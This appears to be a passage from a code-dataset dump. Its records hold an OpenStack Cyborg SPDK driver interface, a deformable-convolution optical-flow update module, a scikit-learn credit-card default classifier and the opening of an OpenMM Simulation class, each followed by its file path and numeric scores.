raise NotImplementedError('Subclasses must implement this method.')
def uninstall_accelerator(self, driver_id, driver_type):
"""uninstall a backend accelerator
:param driver_id: driver id.
:param driver_type: driver type.
:raise: NotImplementedError.
"""
raise NotImplementedError('Subclasses must implement this method.')
def accelerator_list(self):
"""Discover a backend accelerator list
:return: accelerator list.
:raise: NotImplementedError.
"""
raise NotImplementedError('Subclasses must implement this method.')
def update(self, driver_type, **kwargs):
"""update
:param driver_type: driver type.
:param kwargs: kwargs.
:raise: NotImplementedError.
"""
raise NotImplementedError('Subclasses must implement this method.')
def attach_instance(self, instance_id):
"""attach a backend instance
:param instance_id: instance id.
:return: instance.
:raise: NotImplementedError.
"""
raise NotImplementedError('Subclasses must implement this method.')
def detach_instance(self, instance_id):
"""detach a backend instance
:param instance_id: instance id.
:return: instance.
:raise: NotImplementedError.
"""
raise NotImplementedError('Subclasses must implement this method.') | cyborg/accelerator/drivers/spdk/spdk.py | from oslo_log import log as logging
LOG = logging.getLogger(__name__)
class SPDKDRIVER(object):
"""SPDKDRIVER
This is just a virtual SPDK drivers interface.
SPDK-based app server should implement their specific drivers.
"""
@classmethod
def create(cls, server, *args, **kwargs):
for subclass in cls.__subclasses__():
if server == subclass.SERVER:
return subclass(*args, **kwargs)
raise LookupError("Could not find the driver for server %s" % server)
def __init__(self, *args, **kwargs):
super(SPDKDRIVER, self).__init__()
def discover_accelerator(self):
"""Discover a backend accelerator
:return: accelerator list.
"""
raise NotImplementedError('Subclasses must implement this method.')
def install_accelerator(self, driver_id, driver_type):
"""install a backend accelerator
:param driver_id: driver id.
:param driver_type: driver type.
:raise: NotImplementedError.
"""
raise NotImplementedError('Subclasses must implement this method.')
def uninstall_accelerator(self, driver_id, driver_type):
"""uninstall a backend accelerator
:param driver_id: driver id.
:param driver_type: driver type.
:raise: NotImplementedError.
"""
raise NotImplementedError('Subclasses must implement this method.')
def accelerator_list(self):
"""Discover a backend accelerator list
:return: accelerator list.
:raise: NotImplementedError.
"""
raise NotImplementedError('Subclasses must implement this method.')
def update(self, driver_type, **kwargs):
"""update
:param driver_type: driver type.
:param kwargs: kwargs.
:raise: NotImplementedError.
"""
raise NotImplementedError('Subclasses must implement this method.')
def attach_instance(self, instance_id):
"""attach a backend instance
:param instance_id: instance id.
:return: instance.
:raise: NotImplementedError.
"""
raise NotImplementedError('Subclasses must implement this method.')
def detach_instance(self, instance_id):
"""detach a backend instance
:param instance_id: instance id.
:return: instance.
:raise: NotImplementedError.
"""
raise NotImplementedError('Subclasses must implement this method.') | 0.756987 | 0.081119 |
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
def func_conv_deform(x, loc_layer, k, s, layers_act_num, offset_file = '', activated = False):
# print(layers_act_num)
if offset_file == '':
offset_file = './OFFSETS/offset_'+str(int(x.shape[3]/s))+'_'+str(int(x.shape[2]/s))+'_'+str(k)+'_'+str(k)+'_'+str(s)+'_'+str(s)+'_1'+'.pt'
if activated and layers_act_num <= 400:
print(layers_act_num, " activated")
offset = torch.load(offset_file).cuda()
if x.shape[0] != 1:
offset = torch.cat([offset for _ in range(x.shape[0])],dim=0)
else:
print(layers_act_num, " not activated")
offset = torch.zeros(x.shape[0],2*k*k,int(x.shape[2]/s),int(x.shape[3]/s)).cuda()
offset.require_gradient = False
y = loc_layer(x,offset)
del offset
torch.cuda.empty_cache()
return y
def func_conv_deform_2(x, loc_layer, kw, kh, sw, sh, layers_act_num, offset_file = '', activated = False):
# print(layers_act_num)
if offset_file == '':
offset_file = './OFFSETS/offset_'+str(int(x.shape[3]/sw))+'_'+str(int(x.shape[2]/sh))+'_'+str(kw)+'_'+str(kh)+'_'+str(sw)+'_'+str(sh)+'_1'+'.pt'
if activated and layers_act_num <= 400:
print(layers_act_num, " activated")
offset = torch.load(offset_file).cuda()
# print(offset)
if x.shape[0] != 1:
offset = torch.cat([offset for _ in range(x.shape[0])],dim=0)
else:
print(layers_act_num, " not activated")
offset = torch.zeros(x.shape[0],2*kw*kh,int(x.shape[2]/sw),int(x.shape[3]/sh)).cuda()
offset.require_gradient = False
y = loc_layer(x,offset)
del offset
torch.cuda.empty_cache()
return y
class FlowHead(nn.Module):
def __init__(self, input_dim=128, hidden_dim=256):
super(FlowHead, self).__init__()
# self.conv1 = nn.Conv2d(input_dim, hidden_dim, 3, padding=1)
self.conv1 = torchvision.ops.DeformConv2d(input_dim, hidden_dim, 3, padding=1)
# self.conv2 = nn.Conv2d(hidden_dim, 2, 3, padding=1)
self.conv2 = torchvision.ops.DeformConv2d(hidden_dim, 2, 3, padding=1)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
y = self.relu(func_conv_deform(x, self.conv1, 3, 1, 221, '', False))
return func_conv_deform(y, self.conv2, 3, 1, 222, '', False)
class ConvGRU(nn.Module):
def __init__(self, hidden_dim=128, input_dim=192+128):
super(ConvGRU, self).__init__()
self.convz = nn.Conv2d(hidden_dim+input_dim, hidden_dim, 3, padding=1)
self.convr = nn.Conv2d(hidden_dim+input_dim, hidden_dim, 3, padding=1)
self.convq = nn.Conv2d(hidden_dim+input_dim, hidden_dim, 3, padding=1)
def forward(self, h, x):
hx = torch.cat([h, x], dim=1)
z = torch.sigmoid(self.convz(hx))
r = torch.sigmoid(self.convr(hx))
q = torch.tanh(self.convq(torch.cat([r*h, x], dim=1)))
h = (1-z) * h + z * q
return h
class SepConvGRU(nn.Module):
def __init__(self, hidden_dim=128, input_dim=192+128):
super(SepConvGRU, self).__init__()
# self.convz1 = nn.Conv2d(hidden_dim+input_dim, hidden_dim, (1,5), padding=(0,2))
# self.convr1 = nn.Conv2d(hidden_dim+input_dim, hidden_dim, (1,5), padding=(0,2))
# self.convq1 = nn.Conv2d(hidden_dim+input_dim, hidden_dim, (1,5), padding=(0,2))
self.convz1 = torchvision.ops.DeformConv2d(hidden_dim+input_dim, hidden_dim, (1,5), padding=(0,2))
self.convr1 = torchvision.ops.DeformConv2d(hidden_dim+input_dim, hidden_dim, (1,5), padding=(0,2))
self.convq1 = torchvision.ops.DeformConv2d(hidden_dim+input_dim, hidden_dim, (1,5), padding=(0,2))
# self.convz2 = nn.Conv2d(hidden_dim+input_dim, hidden_dim, (5,1), padding=(2,0))
# self.convr2 = nn.Conv2d(hidden_dim+input_dim, hidden_dim, (5,1), padding=(2,0))
# self.convq2 = nn.Conv2d(hidden_dim+input_dim, hidden_dim, (5,1), padding=(2,0))
self.convz2 = torchvision.ops.DeformConv2d(hidden_dim+input_dim, hidden_dim, (5,1), padding=(2,0))
self.convr2 = torchvision.ops.DeformConv2d(hidden_dim+input_dim, hidden_dim, (5,1), padding=(2,0))
self.convq2 = torchvision.ops.DeformConv2d(hidden_dim+input_dim, hidden_dim, (5,1), padding=(2,0))
def forward(self, h, x):
# horizontal
hx = torch.cat([h, x], dim=1)
# z = torch.sigmoid(self.convz1(hx))
z = torch.sigmoid(func_conv_deform_2(hx, self.convz1, 5, 1, 1, 1, 211,'', False))
# r = torch.sigmoid(self.convr1(hx))
r = torch.sigmoid(func_conv_deform_2(hx, self.convr1, 5, 1, 1, 1, 212,'', False))
# q = torch.tanh(self.convq1(torch.cat([r*h, x], dim=1)))
q = torch.tanh(func_conv_deform_2(torch.cat([r*h, x], dim=1), self.convq1, 5, 1, 1, 1, 213,'', False))
h = (1-z) * h + z * q
# vertical
hx = torch.cat([h, x], dim=1)
# z = torch.sigmoid(self.convz2(hx))
z = torch.sigmoid(func_conv_deform_2(hx, self.convz2, 1, 5, 1, 1, 214,'', False))
# r = torch.sigmoid(self.convr2(hx))
r = torch.sigmoid(func_conv_deform_2(hx, self.convr2, 1, 5, 1, 1, 215,'', False))
# q = torch.tanh(self.convq2(torch.cat([r*h, x], dim=1)))
q = torch.tanh(func_conv_deform_2(torch.cat([r*h, x], dim=1), self.convq2, 1, 5, 1, 1, 216,'', False))
h = (1-z) * h + z * q
return h
class SmallMotionEncoder(nn.Module):
def __init__(self, args):
super(SmallMotionEncoder, self).__init__()
cor_planes = args.corr_levels * (2*args.corr_radius + 1)**2
self.convc1 = nn.Conv2d(cor_planes, 96, 1, padding=0)
self.convf1 = nn.Conv2d(2, 64, 7, padding=3)
self.convf2 = nn.Conv2d(64, 32, 3, padding=1)
self.conv = nn.Conv2d(128, 80, 3, padding=1)
def forward(self, flow, corr):
cor = F.relu(self.convc1(corr))
flo = F.relu(self.convf1(flow))
flo = F.relu(self.convf2(flo))
cor_flo = torch.cat([cor, flo], dim=1)
out = F.relu(self.conv(cor_flo))
return torch.cat([out, flow], dim=1)
class BasicMotionEncoder(nn.Module):
def __init__(self, args):
super(BasicMotionEncoder, self).__init__()
cor_planes = args.corr_levels * (2*args.corr_radius + 1)**2
self.convc1 = nn.Conv2d(cor_planes, 256, 1, padding=0)
# self.convc2 = nn.Conv2d(256, 192, 3, padding=1)
self.convc2 = torchvision.ops.DeformConv2d(256, 192, 3, padding=1)
# self.convf1 = nn.Conv2d(2, 128, 7, padding=3)
self.convf1 = torchvision.ops.DeformConv2d(2, 128, 7, padding=3)
# self.convf2 = nn.Conv2d(128, 64, 3, padding=1)
self.convf2 = torchvision.ops.DeformConv2d(128, 64, 3, padding=1)
# self.conv = nn.Conv2d(64+192, 128-2, 3, padding=1)
self.conv = torchvision.ops.DeformConv2d(64+192, 128-2, 3, padding=1)
def forward(self, flow, corr):
cor = F.relu(self.convc1(corr))
# cor = F.relu(self.convc2(cor))
cor = F.relu(func_conv_deform(cor, self.convc2, 3, 1, 201, '', False))
# flo = F.relu(self.convf1(flow))
flo = F.relu(func_conv_deform(flow, self.convf1, 7, 1, 202, '', False))
# flo = F.relu(self.convf2(flo))
flo = F.relu(func_conv_deform(flo, self.convf2, 3, 1, 203, '', False))
cor_flo = torch.cat([cor, flo], dim=1)
# out = F.relu(self.conv(cor_flo))
out = F.relu(func_conv_deform(cor_flo, self.conv, 3, 1, 204, '', False))
return torch.cat([out, flow], dim=1)
class SmallUpdateBlock(nn.Module):
def __init__(self, args, hidden_dim=96):
super(SmallUpdateBlock, self).__init__()
self.encoder = SmallMotionEncoder(args)
self.gru = ConvGRU(hidden_dim=hidden_dim, input_dim=82+64)
self.flow_head = FlowHead(hidden_dim, hidden_dim=128)
def forward(self, net, inp, corr, flow):
motion_features = self.encoder(flow, corr)
inp = torch.cat([inp, motion_features], dim=1)
net = self.gru(net, inp)
delta_flow = self.flow_head(net)
return net, None, delta_flow
class mySequential(nn.Sequential):
def forward(self, *input):
for module in self._modules.values():
if type(input) == tuple:
input = module(*input)
else:
input = module(input)
return input
class BasicUpdateBlock(nn.Module):
def __init__(self, args, hidden_dim=128, input_dim=128):
super(BasicUpdateBlock, self).__init__()
self.args = args
self.encoder = BasicMotionEncoder(args)
self.gru = SepConvGRU(hidden_dim=hidden_dim, input_dim=128+hidden_dim)
self.flow_head = FlowHead(hidden_dim, hidden_dim=256)
# self.mask = nn.Sequential(
# nn.Conv2d(128, 256, 3, padding=1),
# nn.ReLU(inplace=True),
# nn.Conv2d(256, 64*9, 1, padding=0))
self.mask = mySequential(
torchvision.ops.DeformConv2d(128, 256, 3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 64*9, 1, padding=0))
def forward(self, net, inp, corr, flow, upsample=True, num_l_d=0):
# print(num_l_d)
motion_features = self.encoder(flow, corr)
inp = torch.cat([inp, motion_features], dim=1)
net = self.gru(net, inp)
delta_flow = self.flow_head(net)
# scale mask to balence gradients
activated_231 = False
if activated_231 == True:
print("231 activated")
offset_file = './OFFSETS/offset_'+str(int(net.shape[3]/1))+'_'+str(int(net.shape[2]/1))+'_3_3_1_1_1'+'.pt'
offset = torch.load(offset_file).cuda()
else:
print("231 not activated")
offset = torch.zeros(net.shape[0],2*3*3,int(net.shape[2]/1),int(net.shape[3]/1)).cuda()
offset.require_gradient = False
mask = .25 * self.mask(net, offset)
del offset
torch.cuda.empty_cache()
return net, mask, delta_flow | core/update_sphe.py | import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
def func_conv_deform(x, loc_layer, k, s, layers_act_num, offset_file = '', activated = False):
# print(layers_act_num)
if offset_file == '':
offset_file = './OFFSETS/offset_'+str(int(x.shape[3]/s))+'_'+str(int(x.shape[2]/s))+'_'+str(k)+'_'+str(k)+'_'+str(s)+'_'+str(s)+'_1'+'.pt'
if activated and layers_act_num <= 400:
print(layers_act_num, " activated")
offset = torch.load(offset_file).cuda()
if x.shape[0] != 1:
offset = torch.cat([offset for _ in range(x.shape[0])],dim=0)
else:
print(layers_act_num, " not activated")
offset = torch.zeros(x.shape[0],2*k*k,int(x.shape[2]/s),int(x.shape[3]/s)).cuda()
offset.require_gradient = False
y = loc_layer(x,offset)
del offset
torch.cuda.empty_cache()
return y
def func_conv_deform_2(x, loc_layer, kw, kh, sw, sh, layers_act_num, offset_file = '', activated = False):
# print(layers_act_num)
if offset_file == '':
offset_file = './OFFSETS/offset_'+str(int(x.shape[3]/sw))+'_'+str(int(x.shape[2]/sh))+'_'+str(kw)+'_'+str(kh)+'_'+str(sw)+'_'+str(sh)+'_1'+'.pt'
if activated and layers_act_num <= 400:
print(layers_act_num, " activated")
offset = torch.load(offset_file).cuda()
# print(offset)
if x.shape[0] != 1:
offset = torch.cat([offset for _ in range(x.shape[0])],dim=0)
else:
print(layers_act_num, " not activated")
offset = torch.zeros(x.shape[0],2*kw*kh,int(x.shape[2]/sw),int(x.shape[3]/sh)).cuda()
offset.require_gradient = False
y = loc_layer(x,offset)
del offset
torch.cuda.empty_cache()
return y
class FlowHead(nn.Module):
def __init__(self, input_dim=128, hidden_dim=256):
super(FlowHead, self).__init__()
# self.conv1 = nn.Conv2d(input_dim, hidden_dim, 3, padding=1)
self.conv1 = torchvision.ops.DeformConv2d(input_dim, hidden_dim, 3, padding=1)
# self.conv2 = nn.Conv2d(hidden_dim, 2, 3, padding=1)
self.conv2 = torchvision.ops.DeformConv2d(hidden_dim, 2, 3, padding=1)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
y = self.relu(func_conv_deform(x, self.conv1, 3, 1, 221, '', False))
return func_conv_deform(y, self.conv2, 3, 1, 222, '', False)
class ConvGRU(nn.Module):
def __init__(self, hidden_dim=128, input_dim=192+128):
super(ConvGRU, self).__init__()
self.convz = nn.Conv2d(hidden_dim+input_dim, hidden_dim, 3, padding=1)
self.convr = nn.Conv2d(hidden_dim+input_dim, hidden_dim, 3, padding=1)
self.convq = nn.Conv2d(hidden_dim+input_dim, hidden_dim, 3, padding=1)
def forward(self, h, x):
hx = torch.cat([h, x], dim=1)
z = torch.sigmoid(self.convz(hx))
r = torch.sigmoid(self.convr(hx))
q = torch.tanh(self.convq(torch.cat([r*h, x], dim=1)))
h = (1-z) * h + z * q
return h
class SepConvGRU(nn.Module):
def __init__(self, hidden_dim=128, input_dim=192+128):
super(SepConvGRU, self).__init__()
# self.convz1 = nn.Conv2d(hidden_dim+input_dim, hidden_dim, (1,5), padding=(0,2))
# self.convr1 = nn.Conv2d(hidden_dim+input_dim, hidden_dim, (1,5), padding=(0,2))
# self.convq1 = nn.Conv2d(hidden_dim+input_dim, hidden_dim, (1,5), padding=(0,2))
self.convz1 = torchvision.ops.DeformConv2d(hidden_dim+input_dim, hidden_dim, (1,5), padding=(0,2))
self.convr1 = torchvision.ops.DeformConv2d(hidden_dim+input_dim, hidden_dim, (1,5), padding=(0,2))
self.convq1 = torchvision.ops.DeformConv2d(hidden_dim+input_dim, hidden_dim, (1,5), padding=(0,2))
# self.convz2 = nn.Conv2d(hidden_dim+input_dim, hidden_dim, (5,1), padding=(2,0))
# self.convr2 = nn.Conv2d(hidden_dim+input_dim, hidden_dim, (5,1), padding=(2,0))
# self.convq2 = nn.Conv2d(hidden_dim+input_dim, hidden_dim, (5,1), padding=(2,0))
self.convz2 = torchvision.ops.DeformConv2d(hidden_dim+input_dim, hidden_dim, (5,1), padding=(2,0))
self.convr2 = torchvision.ops.DeformConv2d(hidden_dim+input_dim, hidden_dim, (5,1), padding=(2,0))
self.convq2 = torchvision.ops.DeformConv2d(hidden_dim+input_dim, hidden_dim, (5,1), padding=(2,0))
def forward(self, h, x):
# horizontal
hx = torch.cat([h, x], dim=1)
# z = torch.sigmoid(self.convz1(hx))
z = torch.sigmoid(func_conv_deform_2(hx, self.convz1, 5, 1, 1, 1, 211,'', False))
# r = torch.sigmoid(self.convr1(hx))
r = torch.sigmoid(func_conv_deform_2(hx, self.convr1, 5, 1, 1, 1, 212,'', False))
# q = torch.tanh(self.convq1(torch.cat([r*h, x], dim=1)))
q = torch.tanh(func_conv_deform_2(torch.cat([r*h, x], dim=1), self.convq1, 5, 1, 1, 1, 213,'', False))
h = (1-z) * h + z * q
# vertical
hx = torch.cat([h, x], dim=1)
# z = torch.sigmoid(self.convz2(hx))
z = torch.sigmoid(func_conv_deform_2(hx, self.convz2, 1, 5, 1, 1, 214,'', False))
# r = torch.sigmoid(self.convr2(hx))
r = torch.sigmoid(func_conv_deform_2(hx, self.convr2, 1, 5, 1, 1, 215,'', False))
# q = torch.tanh(self.convq2(torch.cat([r*h, x], dim=1)))
q = torch.tanh(func_conv_deform_2(torch.cat([r*h, x], dim=1), self.convq2, 1, 5, 1, 1, 216,'', False))
h = (1-z) * h + z * q
return h
class SmallMotionEncoder(nn.Module):
def __init__(self, args):
super(SmallMotionEncoder, self).__init__()
cor_planes = args.corr_levels * (2*args.corr_radius + 1)**2
self.convc1 = nn.Conv2d(cor_planes, 96, 1, padding=0)
self.convf1 = nn.Conv2d(2, 64, 7, padding=3)
self.convf2 = nn.Conv2d(64, 32, 3, padding=1)
self.conv = nn.Conv2d(128, 80, 3, padding=1)
def forward(self, flow, corr):
cor = F.relu(self.convc1(corr))
flo = F.relu(self.convf1(flow))
flo = F.relu(self.convf2(flo))
cor_flo = torch.cat([cor, flo], dim=1)
out = F.relu(self.conv(cor_flo))
return torch.cat([out, flow], dim=1)
class BasicMotionEncoder(nn.Module):
def __init__(self, args):
super(BasicMotionEncoder, self).__init__()
cor_planes = args.corr_levels * (2*args.corr_radius + 1)**2
self.convc1 = nn.Conv2d(cor_planes, 256, 1, padding=0)
# self.convc2 = nn.Conv2d(256, 192, 3, padding=1)
self.convc2 = torchvision.ops.DeformConv2d(256, 192, 3, padding=1)
# self.convf1 = nn.Conv2d(2, 128, 7, padding=3)
self.convf1 = torchvision.ops.DeformConv2d(2, 128, 7, padding=3)
# self.convf2 = nn.Conv2d(128, 64, 3, padding=1)
self.convf2 = torchvision.ops.DeformConv2d(128, 64, 3, padding=1)
# self.conv = nn.Conv2d(64+192, 128-2, 3, padding=1)
self.conv = torchvision.ops.DeformConv2d(64+192, 128-2, 3, padding=1)
def forward(self, flow, corr):
cor = F.relu(self.convc1(corr))
# cor = F.relu(self.convc2(cor))
cor = F.relu(func_conv_deform(cor, self.convc2, 3, 1, 201, '', False))
# flo = F.relu(self.convf1(flow))
flo = F.relu(func_conv_deform(flow, self.convf1, 7, 1, 202, '', False))
# flo = F.relu(self.convf2(flo))
flo = F.relu(func_conv_deform(flo, self.convf2, 3, 1, 203, '', False))
cor_flo = torch.cat([cor, flo], dim=1)
# out = F.relu(self.conv(cor_flo))
out = F.relu(func_conv_deform(cor_flo, self.conv, 3, 1, 204, '', False))
return torch.cat([out, flow], dim=1)
class SmallUpdateBlock(nn.Module):
def __init__(self, args, hidden_dim=96):
super(SmallUpdateBlock, self).__init__()
self.encoder = SmallMotionEncoder(args)
self.gru = ConvGRU(hidden_dim=hidden_dim, input_dim=82+64)
self.flow_head = FlowHead(hidden_dim, hidden_dim=128)
def forward(self, net, inp, corr, flow):
motion_features = self.encoder(flow, corr)
inp = torch.cat([inp, motion_features], dim=1)
net = self.gru(net, inp)
delta_flow = self.flow_head(net)
return net, None, delta_flow
class mySequential(nn.Sequential):
def forward(self, *input):
for module in self._modules.values():
if type(input) == tuple:
input = module(*input)
else:
input = module(input)
return input
class BasicUpdateBlock(nn.Module):
def __init__(self, args, hidden_dim=128, input_dim=128):
super(BasicUpdateBlock, self).__init__()
self.args = args
self.encoder = BasicMotionEncoder(args)
self.gru = SepConvGRU(hidden_dim=hidden_dim, input_dim=128+hidden_dim)
self.flow_head = FlowHead(hidden_dim, hidden_dim=256)
# self.mask = nn.Sequential(
# nn.Conv2d(128, 256, 3, padding=1),
# nn.ReLU(inplace=True),
# nn.Conv2d(256, 64*9, 1, padding=0))
self.mask = mySequential(
torchvision.ops.DeformConv2d(128, 256, 3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 64*9, 1, padding=0))
def forward(self, net, inp, corr, flow, upsample=True, num_l_d=0):
# print(num_l_d)
motion_features = self.encoder(flow, corr)
inp = torch.cat([inp, motion_features], dim=1)
net = self.gru(net, inp)
delta_flow = self.flow_head(net)
# scale mask to balence gradients
activated_231 = False
if activated_231 == True:
print("231 activated")
offset_file = './OFFSETS/offset_'+str(int(net.shape[3]/1))+'_'+str(int(net.shape[2]/1))+'_3_3_1_1_1'+'.pt'
offset = torch.load(offset_file).cuda()
else:
print("231 not activated")
offset = torch.zeros(net.shape[0],2*3*3,int(net.shape[2]/1),int(net.shape[3]/1)).cuda()
offset.require_gradient = False
mask = .25 * self.mask(net, offset)
del offset
torch.cuda.empty_cache()
return net, mask, delta_flow | 0.667473 | 0.341404 |
import matplotlib
import pandas as pd
from sklearn.model_selection import learning_curve, train_test_split, GridSearchCV
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
from sklearn.metrics import accuracy_score
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from matplotlib import pyplot as plt
# 打印配置文件路径 我的是在个人文件夹
print(matplotlib.matplotlib_fname())
import seaborn as sns
# 数据加载
data = data = pd.read_csv('./UCI_Credit_Card.csv')
# 数据探索
print(data.shape) # 查看数据集大小
print(data.describe()) # 数据集概览
# 查看下一个月违约率的情况
next_month = data['default.payment.next.month'].value_counts()
print(next_month)
df = pd.DataFrame({'default.payment.next.month': next_month.index, 'values': next_month.values})
plt.rcParams['font.sans-serif'] = ['SimHei'] # 用来正常显示中文标签
plt.figure(figsize=(6, 6))
plt.title(u'信用卡违约率客户\n (违约:1,守约:0)')
sns.set_color_codes("pastel")
sns.barplot(x='default.payment.next.month', y="values", data=df)
locs, labels = plt.xticks()
plt.show()
# 特征选择,去掉ID字段、最后一个结果字段即可
data.drop(['ID'], inplace=True, axis=1) # ID这个字段没有用
target = data['default.payment.next.month'].values
columns = data.columns.tolist()
columns.remove('default.payment.next.month')
features = data[columns].values
# 30%作为测试集,其余作为训练集
train_x, test_x, train_y, test_y = train_test_split(features, target, test_size=0.30, stratify=target, random_state=1)
# 构造各种分类器
classifiers = [
SVC(random_state=1, kernel='rbf'),
DecisionTreeClassifier(random_state=1, criterion='gini'),
RandomForestClassifier(random_state=1, criterion='gini'),
KNeighborsClassifier(metric='minkowski'),
]
# 分类器名称
classifier_names = [
'svc',
'decisiontreeclassifier',
'randomforestclassifier',
'kneighborsclassifier',
]
# 分类器参数
classifier_param_grid = [
{'svc__C': [1], 'svc__gamma': [0.01]},
{'decisiontreeclassifier__max_depth': [6, 9, 11]},
{'randomforestclassifier__n_estimators': [3, 5, 6]},
{'kneighborsclassifier__n_neighbors': [4, 6, 8]},
]
# 对具体的分类器进行GridSearchCV参数调优
def GridSearchCV_work(pipeline, train_x, train_y, test_x, test_y, param_grid, score='accuracy'):
response = {}
gridsearch = GridSearchCV(estimator=pipeline, param_grid=param_grid, scoring=score)
# 寻找最优的参数 和最优的准确率分数
search = gridsearch.fit(train_x, train_y)
print("GridSearch最优参数:", search.best_params_)
print("GridSearch最优分数: %0.4lf" % search.best_score_)
predict_y = gridsearch.predict(test_x)
print("准确率 %0.4lf" % accuracy_score(test_y, predict_y))
response['predict_y'] = predict_y
response['accuracy_score'] = accuracy_score(test_y, predict_y)
return response
for model, model_name, model_param_grid in zip(classifiers, classifier_names, classifier_param_grid):
pipeline = Pipeline([
('scaler', StandardScaler()),
(model_name, model)
])
result = GridSearchCV_work(pipeline, train_x, train_y, test_x, test_y, model_param_grid, score='accuracy') | 39/demo4.py | import matplotlib
import pandas as pd
from sklearn.model_selection import learning_curve, train_test_split, GridSearchCV
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
from sklearn.metrics import accuracy_score
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from matplotlib import pyplot as plt
# 打印配置文件路径 我的是在个人文件夹
print(matplotlib.matplotlib_fname())
import seaborn as sns
# 数据加载
data = data = pd.read_csv('./UCI_Credit_Card.csv')
# 数据探索
print(data.shape) # 查看数据集大小
print(data.describe()) # 数据集概览
# 查看下一个月违约率的情况
next_month = data['default.payment.next.month'].value_counts()
print(next_month)
df = pd.DataFrame({'default.payment.next.month': next_month.index, 'values': next_month.values})
plt.rcParams['font.sans-serif'] = ['SimHei'] # 用来正常显示中文标签
plt.figure(figsize=(6, 6))
plt.title(u'信用卡违约率客户\n (违约:1,守约:0)')
sns.set_color_codes("pastel")
sns.barplot(x='default.payment.next.month', y="values", data=df)
locs, labels = plt.xticks()
plt.show()
# 特征选择,去掉ID字段、最后一个结果字段即可
data.drop(['ID'], inplace=True, axis=1) # ID这个字段没有用
target = data['default.payment.next.month'].values
columns = data.columns.tolist()
columns.remove('default.payment.next.month')
features = data[columns].values
# 30%作为测试集,其余作为训练集
train_x, test_x, train_y, test_y = train_test_split(features, target, test_size=0.30, stratify=target, random_state=1)
# 构造各种分类器
classifiers = [
SVC(random_state=1, kernel='rbf'),
DecisionTreeClassifier(random_state=1, criterion='gini'),
RandomForestClassifier(random_state=1, criterion='gini'),
KNeighborsClassifier(metric='minkowski'),
]
# 分类器名称
classifier_names = [
'svc',
'decisiontreeclassifier',
'randomforestclassifier',
'kneighborsclassifier',
]
# 分类器参数
classifier_param_grid = [
{'svc__C': [1], 'svc__gamma': [0.01]},
{'decisiontreeclassifier__max_depth': [6, 9, 11]},
{'randomforestclassifier__n_estimators': [3, 5, 6]},
{'kneighborsclassifier__n_neighbors': [4, 6, 8]},
]
# 对具体的分类器进行GridSearchCV参数调优
def GridSearchCV_work(pipeline, train_x, train_y, test_x, test_y, param_grid, score='accuracy'):
response = {}
gridsearch = GridSearchCV(estimator=pipeline, param_grid=param_grid, scoring=score)
# 寻找最优的参数 和最优的准确率分数
search = gridsearch.fit(train_x, train_y)
print("GridSearch最优参数:", search.best_params_)
print("GridSearch最优分数: %0.4lf" % search.best_score_)
predict_y = gridsearch.predict(test_x)
print("准确率 %0.4lf" % accuracy_score(test_y, predict_y))
response['predict_y'] = predict_y
response['accuracy_score'] = accuracy_score(test_y, predict_y)
return response
for model, model_name, model_param_grid in zip(classifiers, classifier_names, classifier_param_grid):
pipeline = Pipeline([
('scaler', StandardScaler()),
(model_name, model)
])
result = GridSearchCV_work(pipeline, train_x, train_y, test_x, test_y, model_param_grid, score='accuracy') | 0.521471 | 0.45417 |
from __future__ import absolute_import
__author__ = "<NAME>"
__version__ = "1.0"
import simtk.openmm as mm
import simtk.unit as unit
import sys
from datetime import datetime, timedelta
try:
string_types = (unicode, str)
except NameError:
string_types = (str,)
class Simulation(object):
"""Simulation provides a simplified API for running simulations with OpenMM and reporting results.
A Simulation ties together various objects used for running a simulation: a Topology, System,
Integrator, and Context. To use it, you provide the Topology, System, and Integrator, and it
creates the Context automatically.
Simulation also maintains a list of "reporter" objects that record or analyze data as the simulation
runs, such as writing coordinates to files or displaying structures on the screen. For example,
the following line will cause a file called "output.pdb" to be created, and a structure written to
it every 1000 time steps:
simulation.reporters.append(PDBReporter('output.pdb', 1000))
"""
def __init__(self, topology, system, integrator, platform=None, platformProperties=None, state=None):
"""Create a Simulation.
Parameters
----------
topology : Topology
A Topology describing the the system to simulate
system : System or XML file name
The OpenMM System object to simulate (or the name of an XML file
with a serialized System)
integrator : Integrator or XML file name
The OpenMM Integrator to use for simulating the System (or the name
of an XML file with a serialized System)
platform : Platform=None
If not None, the OpenMM Platform to use
platformProperties : map=None
If not None, a set of platform-specific properties to pass to the
Context's constructor
state : XML file name=None
The name of an XML file containing a serialized State. If not None,
the information stored in state will be transferred to the generated
Simulation object.
"""
self.topology = topology
## The System being simulated
if isinstance(system, string_types):
with open(system, 'r') as f:
self.system = mm.XmlSerializer.deserialize(f.read())
else:
self.system = system
## The Integrator used to advance the simulation
if isinstance(integrator, string_types):
with open(integrator, 'r') as f:
self.integrator = mm.XmlSerializer.deserialize(f.read())
else:
self.integrator = integrator
## The index of the current time step
self.currentStep = 0
## A list of reporters to invoke during the simulation
self.reporters = []
if platform is None:
## The Context containing the current state of the simulation
self.context = mm.Context(self.system, self.integrator)
elif platformProperties is None:
self.context = mm.Context(self.system, self.integrator, platform)
else:
self.context = mm.Context(self.system, self.integrator, platform, platformProperties)
if state is not None:
with open(state, 'r') as f:
self.context.setState(mm.XmlSerializer.deserialize(f.read()))
## Determines whether or not we are using PBC. Try from the System first,
## fall back to Topology if that doesn't work
try:
self._usesPBC = self.system.usesPeriodicBoundaryConditions()
except Exception: # OpenMM just raises Exception if it's not implemented everywhere
self._usesPBC = topology.getUnitCellDimensions() is not None
def minimizeEnergy(self, tolerance=10*unit.kilojoule/unit.mole, maxIterations=0):
"""Perform a local energy minimization on the system.
Parameters
----------
tolerance : energy=10*kilojoules/mole
The energy tolerance to which the system should be minimized
maxIterations : int=0
The maximum number of iterations to perform. If this is 0,
minimization is continued until the results converge without regard
to how many iterations it takes.
"""
mm.LocalEnergyMinimizer.minimize(self.context, tolerance, maxIterations)
def step(self, steps):
"""Advance the simulation by integrating a specified number of time steps."""
